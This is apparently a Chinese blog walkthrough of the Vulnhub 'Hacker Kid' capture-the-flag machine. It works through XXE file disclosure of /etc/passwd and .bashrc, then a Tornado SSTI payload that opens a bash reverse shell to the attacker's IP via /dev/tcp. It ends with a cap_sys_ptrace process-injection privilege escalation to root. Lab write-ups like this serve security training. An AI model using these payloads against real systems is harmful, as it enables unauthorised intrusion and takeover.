freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

OSCP-Vulnhub靶机记录-hacker-kid-walkthrough
2022-09-14 23:29:35
所属地 湖北省

靶机地址:

https://www.vulnhub.com/entry/hacker-kid-101,719/

安装靶机:

v2-4a92d730996e9f013cd7e8acedda37fe_720w.jpg

发现目标:

arp-scan -l

v2-f767169761d528cc502b7ed1f03ce6b8_720w.jpg

192.168.52.134

扫一下端口:

v2-9cd57496b7fb759fd70068c1ca2f2a2b_720w.jpg

看一下80端口

v2-231267020980ba203e91ebd62439054d_720w.jpg

这里有个提示:DIG,结合53端口DNS服务,后面可以尝试DNS枚举

看一下页面源代码:

v2-34b885917fda03bc0f025bc5102f30d1_720w.jpg

用page_no 作为GET参数浏览页面,先试一下1:

v2-31ad313944809c3660b0c811917d6b13_720w.jpg

被调侃了,要更深入一些,那就掏出burp:

v2-1b7db969a01d006df8536511d0b33518_720w.jpgv2-9f83b13f5611d2a8e29b03c52e14dd03_720w.jpgv2-73698d534198af3cdeb7b2d3f35649b5_720w.jpg

得到 21:

v2-325b30d2fad19f2ec184cc138701f0df_720w.jpg

得到一个子域名:hackers.blackhat.local

添加到 /etc/hosts

v2-7dee70bdacf1a4d072838009812eb664_720w.jpg

挖到新子域名:

v2-9f09e95066ccf3a69bd02657da04bd27_720w.jpg

继续添加进/etc/hosts

然后访问这个子域名:

v2-81eb88f9967c08ed45edefd4731f1020_720w.jpg

继续带burp看看:

v2-e762010c9312da94c195489ce7b19874_720w.jpgv2-0339351b6ec3ea4e50fc9c78e2aaa3d1_720w.jpg

XML格式,可以试试XXE注入漏洞:

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20Injection

v2-0be09549cfb0164274e898599e401e89_720w.jpg

3被带出来了,email是注入点

放到repeater里X进去

v2-a3a3dc2ae9efca623057465097162e05_720w.jpg

成功带出/etc/passwd

找到saket用户,/bin/bash

尝试查看配置信息.bashrc无果,将参数用base64编码后,再用php协议请求:

v2-5f95f76dac24411a1642afa5ee5202d7_720w.jpg

解码:

v2-d740c1501e81e42d451fd3e9ef9d5b55_720w.jpg

复制到攻击机,并查看,在文档最后找到一个用户名和密码:

v2-4dba5baefc946f5157f563ebb054be2a_720w.jpg

在9999端口的界面试一下:

v2-fd4646210364dc653557403943a35245_720w.jpg

admin登不上

换成saket以后成功登录:

v2-5479ac6586f3a057e9876f8d2f2a0cec_720w.jpg

9999端口,运行的是tornado WebSever,搜索了他的使用手册,有GET和POST两种方法传递参数,这里先尝试GET:

把name作为参数传进去,成功了:

v2-1be7b896889819e86102b2d01b69728c_720w.jpg

尝试SSTI注入: {{7*7}}

v2-596df8ef1ddf9effd02c8ed9c0b7ae27_720w.jpg

注入成功

替换成shell

{% import os %}{{os.system('bash -c "bash -i >& /dev/tcp/192.168.52.129/9001 0>&1"')}}

url编码后再输入地址栏:

v2-440ea52578f352d8156269f0163a686a_720w.jpg

此前,攻击机开启监听模式

nc -nvlp 9001

v2-23da557d5a91121faa26837be1141b77_720w.jpg

连接反弹shell:

v2-7387bba6ac238378a05907aa3bba1f41_720w.jpg

然后升级到交互式shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

接下来提权

检查靶机上所有二进制文件的功能:

/sbin/getcap -r / 2>/dev/null

v2-17b5c01125f7973920ff8c49703cd3b1_720w.jpg

python2.7 = cap_sys_ptrace+ep

这里可以提权

提权脚本:

https://www.cnblogs.com/zlgxzswjy/p/15185591.html

把inject.py复制到攻击机,然后开启http服务,在靶机通过wget下载inject.py

v2-138a62e74f63e91d545709c5222d1abc_720w.jpgv2-c839eb1eafde2fcc3d89f9e82fdd4fbd_720w.jpg

因为需要找root进程进行注入,所以简单写个脚本对root进程进行批量尝试:

for i in `ps -ef|grep root|grep -v "grep"|awk '{print $2}'`; do python2.7 inject.py $i; done

然后 查看5600是否开启:

v2-9f3990c182663f38ef1e7472dbc5ce70_720w.jpg

进程注入成功

攻击机nc连这个端口:

v2-0fd76b6c86def51d1e445d855a4f4133_720w.jpg

root到手

# 渗透测试 # 黑客 # web安全 # 网络安全技术
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者